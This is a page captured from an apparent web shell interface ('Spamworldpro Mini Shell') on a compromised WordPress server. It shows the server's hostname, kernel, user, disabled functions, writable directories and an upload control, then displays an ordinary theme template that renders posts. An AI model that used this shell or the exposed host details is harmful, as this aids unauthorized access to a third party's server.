Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /proc/thread-self/cwd/wp-content/themes/framey/template-parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/cwd/wp-content/themes/framey/template-parts/content.php
<?php
/**
 * Template part for displaying posts
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package uicore-theme
 */

?>
<article id="post-<?php the_ID(); ?>" <?php
if(is_single() || is_search()){
	post_class("uicore-col-md-12 uicore-col-lg-12");
}else{
	if (is_active_sidebar( 'left-sidebar' ) && is_active_sidebar( 'right-sidebar' )){
		post_class("uicore-col-md-6 uicore-col-lg-6");
	}else{
		post_class("uicore-col-md-6 uicore-col-lg-4");
	}
}
?>>
	<div class="uicore-grid-item">
		<header class="entry-header">
			<?php
			if (! is_singular() ) {
				/* translators: used between list items, there is a space after the comma */
				$categories_list = get_the_category_list( esc_html__( ', ', 'framey' ) );
				if ( $categories_list ) {
					echo '<span class="cat-links">' . $categories_list . '</span>';
				}
				the_title( '<h2 class="entry-title"><a href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h2>' );
			}
			?>
		</header><!-- .entry-header -->


			<?php
			if( !is_singular()) {
				if( strlen( trim($ex_data = get_the_excerpt()) ) ){
					echo '<div class="entry-content">';
					echo esc_html($ex_data);
					echo '</div><!-- .entry-content -->';
				}
			}else{
				echo '<div class="entry-content">';
				the_content( sprintf(
					wp_kses(
						/* translators: %s: Name of current post. Only visible to screen readers */
						__( 'Continue reading<span class="screen-reader-text"> "%s"</span>', 'framey' ),
						array(
							'span' => array(
								'class' => array(),
							),
						)
					),
					get_the_title()
				) );

				wp_link_pages( array(
					'before' => '<div class="page-links">' . esc_html__( 'Pages:', 'framey' ),
					'after'  => '</div>',
				) );
				echo '</div><!-- .entry-content -->';
			}
			?>
		

		<footer class="entry-footer">
			<?php uicore_entry_footer(); ?>
		</footer><!-- .entry-footer -->
	</div>
</article><!-- #post-<?php the_ID(); ?> -->

Spamworldpro Mini